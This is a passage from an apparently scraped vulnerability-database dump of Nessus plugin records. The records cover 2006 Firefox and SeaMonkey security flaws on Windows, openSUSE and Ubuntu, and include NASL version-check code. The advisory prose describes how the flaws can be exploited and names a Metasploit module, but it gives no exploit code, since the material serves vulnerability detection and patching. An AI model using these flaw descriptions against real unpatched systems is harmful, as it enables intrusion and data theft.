script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-56/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox 1.5.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\nscript_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\");\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'1.5.0.5', severity:SECURITY_HOLE);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:47:04", "description": "This security update brings Mozilla SeaMonkey to version 1.0.4.\n\nPlease also see\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nfor more details.\n\nIt includes fixes to the following security problems :\n\n - CVE-2006-3801/MFSA 2006-44: Code execution through\n deleted frame reference\n\n Thilo Girmann discovered that in certain circumstances a\n JavaScript reference to a frame or window was not\n properly cleared when the referenced content went away,\n and he demonstrated that this pointer to a deleted\n object could be used to execute native code supplied by\n the attacker.\n\n - CVE-2006-3677/MFSA 2006-45: JavaScript navigator Object\n Vulnerability\n\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java\n would reference properties of the window.navigator\n object as it started up. If the page replaced the\n navigator object before starting Java then the browser\n would crash in a way that could be exploited to run\n native code supplied by the attacker.\n\n - CVE-2006-3113/MFSA 2006-46: Memory corruption with\n simultaneous events\n\n Secunia Research has discovered a vulnerability in\n Mozilla Firefox 1.5 branch, which can be exploited by\n malicious people to compromise a user's system.\n\n The vulnerability is caused due to an memory corruption\n error within the handling of simultaneously happening\n XPCOM events, which leads to use of a deleted timer\n object. This generally results in a crash but\n potentially could be exploited to execute arbitrary code\n on a user's system when a malicious website is visited.\n\n - CVE-2006-3802/MFSA 2006-47: Native DOM methods can be\n hijacked across domains\n\n A malicious page can hijack native DOM methods on a\n document object in another domain, which will run the\n attacker's script when called by the victim page. This\n could be used to steal login cookies, password, or other\n sensitive data on the target page, or to perform actions\n on behalf of a logged-in user.\n\n Access checks on all other properties and document nodes\n are performed correctly. This cross-site scripting (XSS)\n attack is limited to pages which use standard DOM\n methods of the top-level document object, such as\n document.getElementById(). This includes many popular\n sites, especially the newer ones that offer rich\n interaction to the user.\n\n - CVE-2006-3803/MFSA 2006-48: JavaScript new Function race\n condition\n\n H. D. Moore reported a testcase that was able to trigger\n a race condition where JavaScript garbage collection\n deleted a temporary variable still being used in the\n creation of a new Function object. The resulting use of\n a deleted object may be potentially exploitable to run\n native code provided by the attacker.\n\n - CVE-2006-3804/MFSA 2006-49: Heap buffer overwrite on\n malformed VCard\n\n A VCard attachment with a malformed base64 field (such\n as a photo) can trigger a heap buffer overwrite. These\n have proven exploitable in the past, though in this case\n the overwrite is accompanied by an integer underflow\n that would attempt to copy more data than the typical\n machine has, leading to a crash.\n\n - CVE-2006-3806/MFSA 2006-50: JavaScript engine\n vulnerabilities\n\n Continuing our security audit of the JavaScript engine,\n Mozilla developers found and fixed several potential\n vulnerabilities.\n\n Igor Bukanov and shutdown found additional places where\n an untimely garbage collection could delete a temporary\n object that was in active use (similar to MFSA 2006-01\n and MFSA 2006-10). Some of these may allow an attacker\n to run arbitrary code given the right conditions.\n\n Georgi Guninski found potential integer overflow issues\n with long strings in the toSource() methods of the\n Object, Array and String objects as well as string\n function arguments.\n\n - CVE-2006-3807/MFSA 2006-51: Privilege escalation using\n named-functions and redefined 'new Object()'\n\n moz_bug_r_a4 discovered that named JavaScript functions\n have a parent object created using the standard Object()\n constructor (ECMA-specified behavior) and that this\n constructor can be redefined by script (also\n ECMA-specified behavior). If the Object() constructor is\n changed to return a reference to a privileged object\n with useful properties it is possible to have\n attacker-supplied script excuted with elevated\n privileges by calling the function. This could be used\n to install malware or take other malicious actions.\n\n Our fix involves calling the internal Object constructor\n which appears to be what other ECMA-compatible\n interpreters do.\n\n - CVE-2006-3808/MFSA 2006-52: PAC privilege escalation\n using Function.prototype.call\n\n moz_bug_r_a4 reports that a malicious Proxy AutoConfig\n (PAC) server could serve a PAC script that can execute\n code with elevated privileges by setting the required\n FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox. By\n redirecting the victim to a specially crafted URL --\n easily done since the PAC script controls which proxy to\n use -- the URL 'hostname' can be executed as privileged\n script.\n\n A malicious proxy server can perform spoofing attacks on\n the user so it was already important to use a\n trustworthy PAC server.\n\n - CVE-2006-3809/MFSA 2006-53: UniversalBrowserRead\n privilege escalation\n\n shutdown reports that scripts granted the\n UniversalBrowserRead privilege can leverage that into\n the equivalent of the far more powerful\n UniversalXPConnect since they are allowed to 'read' into\n a privileged context. This allows the attacker the\n ability to run scripts with the full privelege of the\n user running the browser, possibly installing malware or\n snooping on private data. This has been fixed so that\n UniversalBrowserRead and UniversalBrowserWrite are\n limited to reading from and writing into only\n normally-privileged browser windows and frames.\n\n - CVE-2006-3810/MFSA 2006-54: XSS with\n XPCNativeWrapper(window).Function(...)\n\n shutdown reports that cross-site scripting (XSS) attacks\n could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a\n function that appeared to belong to the window in\n question even after it had been navigated to the target\n site.\n\n - CVE-2006-3811/MFSA 2006-55: Crashes with evidence of\n memory corruption\n\n As part of the Firefox 1.5.0.5 stability and security\n release, developers in the Mozilla community looked for\n and fixed several crash bugs to improve the stability of\n Mozilla clients. Some of these crashes showed evidence\n of memory corruption that we presume could be exploited\n to run arbitrary code with enough effort.\n\n - CVE-2006-3812/MFSA 2006-56: chrome: scheme loading\n remote content\n\n Benjamin Smedberg discovered that chrome URL's could be\n made to reference remote files, which would run scripts\n with full privilege. There is no known way for web\n content to successfully load a chrome: url, but if a\n user could be convinced to do so manually (perhaps by\n copying a link and pasting it into the location bar)\n this could be exploited.", "edition": 25, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : seamonkey (seamonkey-1952)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:seamonkey-calendar", "p-cpe:/a:novell:opensuse:seamonkey-mail", "p-cpe:/a:novell:opensuse:seamonkey-dom-inspector", "p-cpe:/a:novell:opensuse:seamonkey-spellchecker", "p-cpe:/a:novell:opensuse:seamonkey-venkman", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:seamonkey-irc", "p-cpe:/a:novell:opensuse:seamonkey"], "id": "SUSE_SEAMONKEY-1952.NASL", "href": "https://www.tenable.com/plugins/nessus/27435", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update seamonkey-1952.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27435);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n\n script_name(english:\"openSUSE 10 Security Update : seamonkey (seamonkey-1952)\");\n script_summary(english:\"Check for the seamonkey-1952 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update brings Mozilla SeaMonkey to version 1.0.4.\n\nPlease also see\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nfor more details.\n\nIt includes fixes to the following security problems :\n\n - CVE-2006-3801/MFSA 2006-44: Code execution through\n deleted frame reference\n\n Thilo Girmann discovered that in certain circumstances a\n JavaScript reference to a frame or window was not\n properly cleared when the referenced content went away,\n and he demonstrated that this pointer to a deleted\n object could be used to execute native code supplied by\n the attacker.\n\n - CVE-2006-3677/MFSA 2006-45: JavaScript navigator Object\n Vulnerability\n\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java\n would reference properties of the window.navigator\n object as it started up. If the page replaced the\n navigator object before starting Java then the browser\n would crash in a way that could be exploited to run\n native code supplied by the attacker.\n\n - CVE-2006-3113/MFSA 2006-46: Memory corruption with\n simultaneous events\n\n Secunia Research has discovered a vulnerability in\n Mozilla Firefox 1.5 branch, which can be exploited by\n malicious people to compromise a user's system.\n\n The vulnerability is caused due to an memory corruption\n error within the handling of simultaneously happening\n XPCOM events, which leads to use of a deleted timer\n object. This generally results in a crash but\n potentially could be exploited to execute arbitrary code\n on a user's system when a malicious website is visited.\n\n - CVE-2006-3802/MFSA 2006-47: Native DOM methods can be\n hijacked across domains\n\n A malicious page can hijack native DOM methods on a\n document object in another domain, which will run the\n attacker's script when called by the victim page. This\n could be used to steal login cookies, password, or other\n sensitive data on the target page, or to perform actions\n on behalf of a logged-in user.\n\n Access checks on all other properties and document nodes\n are performed correctly. This cross-site scripting (XSS)\n attack is limited to pages which use standard DOM\n methods of the top-level document object, such as\n document.getElementById(). This includes many popular\n sites, especially the newer ones that offer rich\n interaction to the user.\n\n - CVE-2006-3803/MFSA 2006-48: JavaScript new Function race\n condition\n\n H. D. Moore reported a testcase that was able to trigger\n a race condition where JavaScript garbage collection\n deleted a temporary variable still being used in the\n creation of a new Function object. The resulting use of\n a deleted object may be potentially exploitable to run\n native code provided by the attacker.\n\n - CVE-2006-3804/MFSA 2006-49: Heap buffer overwrite on\n malformed VCard\n\n A VCard attachment with a malformed base64 field (such\n as a photo) can trigger a heap buffer overwrite. These\n have proven exploitable in the past, though in this case\n the overwrite is accompanied by an integer underflow\n that would attempt to copy more data than the typical\n machine has, leading to a crash.\n\n - CVE-2006-3806/MFSA 2006-50: JavaScript engine\n vulnerabilities\n\n Continuing our security audit of the JavaScript engine,\n Mozilla developers found and fixed several potential\n vulnerabilities.\n\n Igor Bukanov and shutdown found additional places where\n an untimely garbage collection could delete a temporary\n object that was in active use (similar to MFSA 2006-01\n and MFSA 2006-10). Some of these may allow an attacker\n to run arbitrary code given the right conditions.\n\n Georgi Guninski found potential integer overflow issues\n with long strings in the toSource() methods of the\n Object, Array and String objects as well as string\n function arguments.\n\n - CVE-2006-3807/MFSA 2006-51: Privilege escalation using\n named-functions and redefined 'new Object()'\n\n moz_bug_r_a4 discovered that named JavaScript functions\n have a parent object created using the standard Object()\n constructor (ECMA-specified behavior) and that this\n constructor can be redefined by script (also\n ECMA-specified behavior). If the Object() constructor is\n changed to return a reference to a privileged object\n with useful properties it is possible to have\n attacker-supplied script excuted with elevated\n privileges by calling the function. This could be used\n to install malware or take other malicious actions.\n\n Our fix involves calling the internal Object constructor\n which appears to be what other ECMA-compatible\n interpreters do.\n\n - CVE-2006-3808/MFSA 2006-52: PAC privilege escalation\n using Function.prototype.call\n\n moz_bug_r_a4 reports that a malicious Proxy AutoConfig\n (PAC) server could serve a PAC script that can execute\n code with elevated privileges by setting the required\n FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox. By\n redirecting the victim to a specially crafted URL --\n easily done since the PAC script controls which proxy to\n use -- the URL 'hostname' can be executed as privileged\n script.\n\n A malicious proxy server can perform spoofing attacks on\n the user so it was already important to use a\n trustworthy PAC server.\n\n - CVE-2006-3809/MFSA 2006-53: UniversalBrowserRead\n privilege escalation\n\n shutdown reports that scripts granted the\n UniversalBrowserRead privilege can leverage that into\n the equivalent of the far more powerful\n UniversalXPConnect since they are allowed to 'read' into\n a privileged context. This allows the attacker the\n ability to run scripts with the full privelege of the\n user running the browser, possibly installing malware or\n snooping on private data. This has been fixed so that\n UniversalBrowserRead and UniversalBrowserWrite are\n limited to reading from and writing into only\n normally-privileged browser windows and frames.\n\n - CVE-2006-3810/MFSA 2006-54: XSS with\n XPCNativeWrapper(window).Function(...)\n\n shutdown reports that cross-site scripting (XSS) attacks\n could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a\n function that appeared to belong to the window in\n question even after it had been navigated to the target\n site.\n\n - CVE-2006-3811/MFSA 2006-55: Crashes with evidence of\n memory corruption\n\n As part of the Firefox 1.5.0.5 stability and security\n release, developers in the Mozilla community looked for\n and fixed several crash bugs to improve the stability of\n Mozilla clients. Some of these crashes showed evidence\n of memory corruption that we presume could be exploited\n to run arbitrary code with enough effort.\n\n - CVE-2006-3812/MFSA 2006-56: chrome: scheme loading\n remote content\n\n Benjamin Smedberg discovered that chrome URL's could be\n made to reference remote files, which would run scripts\n with full privilege. There is no known way for web\n content to successfully load a chrome: url, but if a\n user could be convinced to do so manually (perhaps by\n copying a link and pasting it into the location bar)\n this could be exploited.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/projects/security/known-vulnerabilities.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-irc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-spellchecker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-venkman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-calendar-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-dom-inspector-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-irc-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-mail-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-spellchecker-1.0.4-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"seamonkey-venkman-1.0.4-2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:44:56", "description": "Various flaws have been reported that allow an attacker to execute\narbitrary code with user privileges by tricking the user into opening\na malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,\nCVE-2006-3809, CVE-2006-3811, CVE-2006-3812)\n\ncross-site scripting vulnerabilities were found in the\nXPCNativeWrapper() function and native DOM method handlers. A\nmalicious website could exploit these to modify the contents or steal\nconfidential data (such as passwords) from other opened web pages.\n(CVE-2006-3802, CVE-2006-3810)\n\nA bug was found in the script handler for automatic proxy\nconfiguration. A malicious proxy could send scripts which could\nexecute arbitrary code with the user's privileges. (CVE-2006-3808)\n\nPlease see \n\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#Fi\nrefox\n\nfor technical details of these vulnerabilities.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2007-11-10T00:00:00", "title": "Ubuntu 6.06 LTS : firefox vulnerabilities (USN-327-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2007-1794", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libnspr-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-dev", "p-cpe:/a:canonical:ubuntu_linux:libnspr4", "p-cpe:/a:canonical:ubuntu_linux:firefox-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox", "p-cpe:/a:canonical:ubuntu_linux:libnss-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-dbg", "p-cpe:/a:canonical:ubuntu_linux:libnss3", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-327-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27905", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-327-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27905);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\", \"CVE-2007-1794\");\n script_xref(name:\"USN\", value:\"327-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS : firefox vulnerabilities (USN-327-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various flaws have been reported that allow an attacker to execute\narbitrary code with user privileges by tricking the user into opening\na malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,\nCVE-2006-3809, CVE-2006-3811, CVE-2006-3812)\n\ncross-site scripting vulnerabilities were found in the\nXPCNativeWrapper() function and native DOM method handlers. A\nmalicious website could exploit these to modify the contents or steal\nconfidential data (such as passwords) from other opened web pages.\n(CVE-2006-3802, CVE-2006-3810)\n\nA bug was found in the script handler for automatic proxy\nconfiguration. A malicious proxy could send scripts which could\nexecute arbitrary code with the user's privileges. (CVE-2006-3808)\n\nPlease see \n\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#Fi\nrefox\n\nfor technical details of these vulnerabilities.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/327-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnspr-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnspr4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"firefox\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"firefox-dbg\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"firefox-dev\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"firefox-dom-inspector\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"firefox-gnome-support\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libnspr-dev\", pkgver:\"1.firefox1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libnspr4\", pkgver:\"1.firefox1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libnss-dev\", pkgver:\"1.firefox1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libnss3\", pkgver:\"1.firefox1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-firefox\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-firefox-dev\", pkgver:\"1.5.dfsg+1.5.0.5-0ubuntu6.06\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-dbg / firefox-dev / firefox-dom-inspector / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:00", "description": "Updated SeaMonkey packages that fix several security bugs are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found 